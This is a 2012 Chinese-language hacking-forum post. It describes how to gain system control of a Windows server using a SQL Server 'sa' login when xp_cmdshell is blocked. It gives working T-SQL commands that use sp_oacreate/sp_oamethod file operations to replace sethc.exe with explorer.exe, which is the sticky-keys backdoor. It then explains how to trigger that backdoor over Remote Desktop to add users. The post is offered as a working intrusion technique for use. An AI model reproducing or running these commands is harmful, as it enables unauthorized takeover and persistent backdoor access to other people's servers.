sa无xp_cmdshell取得系统权限的方法

[复制链接]
查看302 | 回复0 | 2012-4-1 19:18:37 | 显示全部楼层 |阅读模式
有了sa但无xp_cmdshell,怎么恢复都提示出错。好象是xxxx.cpp哪里哪里出错。或者找不到指定模块,反正我遇到好多次了。在用execsp_oacreate'wscript.shell'也没办法的情况下。。可用此方法(很多服务器都把'wscript.shell'给删了。)


看到既然能用sp_oacreate,sp_oamethod来弄'wscript.shell'或者scripting.filesystemobject

网上看到的文章都只有几个用法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件。于是乎应该可以也能复制,删除文件吧。。

上网找了些资料,得到下面方法:


复制文件:
 
 



declare@ooint

execsp_oacreate'scripting.filesystemobject',@ooout

execsp_oamethod@oo,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe';
declare@oint

execsp_oacreate'scripting.filesystemobject',@oout

execsp_oamethod@o,'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';






成功后3389登陆按五次shift键。成功进入服务器。一直向上点”我的电脑“右键“管理”用户管理直接加用户。

此法随无技术可言,希望对某些人有点用。


 
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则